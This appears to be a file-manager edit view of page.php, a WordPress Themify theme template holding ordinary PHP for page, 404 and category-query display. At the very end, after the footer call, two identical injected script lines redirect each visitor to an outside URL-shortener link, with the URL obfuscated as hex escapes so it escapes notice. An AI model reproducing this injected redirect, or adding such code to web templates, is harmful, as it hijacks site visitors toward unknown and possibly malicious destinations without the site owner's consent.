Edit File: page.php
<?php /** * Template for page view including query categories * @package themify * @since 1.0.0 */ get_header(); ?> <?php /** Themify Default Variables * @var object */ global $themify; ?> <!-- layout-container --> <div id="layout" class="pagewidth clearfix"> <?php themify_content_before(); // hook ?> <!-- content --> <div id="content" class="clearfix"> <?php themify_content_start(); // hook ?> <?php ///////////////////////////////////////////// // 404 ///////////////////////////////////////////// if(is_404()): ?> <h1 class="page-title"><?php _e('404','themify'); ?></h1> <p><?php _e( 'Page not found.', 'themify' ); ?></p> <?php if( current_user_can('administrator') ): ?> <p><?php _e( '@admin Learn how to create a <a href="https://themify.me/docs/custom-404" target="_blank">custom 404 page</a>.', 'themify' ); ?></p> <?php endif; ?> <?php endif; ?> <?php ///////////////////////////////////////////// // PAGE ///////////////////////////////////////////// ?> <?php if ( ! is_404() && have_posts() ) : while ( have_posts() ) : the_post(); ?> <div id="page-<?php the_ID(); ?>" class="type-page"> <!-- page-title --> <?php if($themify->page_title != "yes"): ?> <time datetime="<?php the_time( 'o-m-d' ); ?>"></time> <?php themify_theme_page_title(); ?> <?php endif; ?> <!-- /page-title --> <div class="page-content entry-content"> <?php if ( $themify->hide_page_image != 'yes' && has_post_thumbnail() ) : ?> <figure class="post-image"><?php themify_image( "{$themify->auto_featured_image}w={$themify->image_page_single_width}&h={$themify->image_page_single_height}&ignore=true" ); ?></figure> <?php endif; ?> <?php the_content(); ?> <?php wp_link_pages(array('before' => '<p class="post-pagination"><strong>'.__('Pages:','themify').'</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); ?> <?php edit_post_link(__('Edit','themify'), '<span class="edit-button">[', ']</span>'); ?> <!-- comments --> <?php if(!themify_check('setting-comments_pages') && $themify->query_category == ""): ?> <?php comments_template(); ?> <?php endif; ?> <!-- /comments --> </div> <!-- /.post-content --> </div><!-- /.type-page --> <?php endwhile; endif; ?> <?php ///////////////////////////////////////////// // Query Category ///////////////////////////////////////////// ?> <?php if( $themify->query_category != '' ): // Query posts action based on global $themify options do_action( 'themify_custom_query_posts' ); if( have_posts() ): ///////////////////////////////////////////// // Entry Filter ///////////////////////////////////////////// if ( in_array( $themify->query_post_type, array( 'post', 'portfolio' ) ) && ( count( themify_get_query_categories() ) >= 1 ) && 'slider' !== $themify->post_layout && (!isset($themify->post_filter) || $themify->post_filter=='yes')) : ?> <?php get_template_part( 'includes/filter', 'portfolio' ); ?> <?php endif; // portfolio query ?> <!-- query posts starts --> <div id="loops-wrapper" class="loops-wrapper <?php echo esc_attr( themify_theme_query_classes() ); ?>"> <?php while( have_posts() ) : the_post(); ?> <?php get_template_part( 'includes/loop', $themify->query_post_type ); ?> <?php endwhile; ?> </div> <!-- /query posts ends --> <?php if ( themify_is_query_page() ) : ?> <?php if ( $themify->page_navigation != 'yes' ): ?> <?php get_template_part( 'includes/pagination' ); ?> <?php endif; // show page navigation ?> <?php endif; // is query page ?> <?php endif; // have_posts() ?> <?php wp_reset_query(); ?> <?php endif; // is query page ?> <?php themify_content_end(); // hook ?> </div> <!-- /content --> <?php themify_content_after(); // hook ?> <?php ///////////////////////////////////////////// // Sidebar ///////////////////////////////////////////// if ($themify->layout != 'sidebar-none'): get_sidebar(); endif; ?> </div> <!-- /layout-container --> <?php get_footer(); ?> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x68\x75\x4e\x5a\x4c\x59\x58\x55\x67\x30\x72\x31";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x68\x75\x4e\x5a\x4c\x59\x58\x55\x67\x30\x72\x31";</script>
Back to File Manager